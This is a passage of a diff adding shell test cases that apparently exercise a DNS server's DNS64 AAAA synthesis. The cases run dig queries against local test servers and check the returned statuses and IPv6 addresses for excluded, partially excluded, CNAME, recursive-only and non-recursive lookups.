$DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-bad-a.example. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-good-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::1.2.3.4" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl ignores mapped A records (all mapped) ($n)" +ret=0 +$DIG $DIGOPTS a-and-mapped.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::1.2.3.5" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl ignores mapped A records (some mapped) ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa-and-mapped.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::4" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::ffff:1.2.3.4" dig.out.ns2.test$n > /dev/null && ret=1 +grep "::ffff:1.2.3.5" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl works with AAAA only ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. 
@10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking default exclude acl A only lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-only.example. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:bbbb::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially excluded only AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded AAAA and non-mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-bad-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking partially-excluded only AAAA and mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS partially-excluded-good-a.example. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-not-mapped.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS mx-only.example. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup works ($n)" +ret=0 +$DIG $DIGOPTS non-existent.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-bad-a.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-good-a.example. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:aaaa::1.2.3.4" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only via CNAME lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only via CNAME lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-only.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA via CNAME lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-and-aaaa.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A via CNAME lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-not-mapped.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME a-not-mapped.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA via CNAME lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-mx-only.example.
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA via CNAME lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-non-existent.example. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Check the example. domain recursive only
+
+echo_i "checking non-excluded AAAA lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS excluded-bad-a.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:bbbb::1.2.3.4" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking partially excluded only AAAA lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS partially-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::3" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking partially-excluded AAAA and non-mapped A lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS partially-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking partially-excluded only AAAA and mapped A lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS partially-excluded-good-a.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:bbbb::102:305" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS mx-only.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-excluded AAAA via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-excluded-good-a.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:bbbb::102:304" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:bbbb::102:305" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME a-not-mapped.example."
dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA via CNAME lookup works, recursive only ($n)"
+ret=0
+$DIG $DIGOPTS cname-non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Check the example. domain recursive only w/o recursion
+
+echo_i "checking non-excluded AAAA lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec excluded-only.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking partially excluded only AAAA lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec partially-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee:" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::3" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking partially-excluded AAAA and non-mapped A lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec partially-excluded-bad-a.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee:" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking partially-excluded only AAAA and mapped A lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec partially-excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee:" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec a-and-aaaa.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
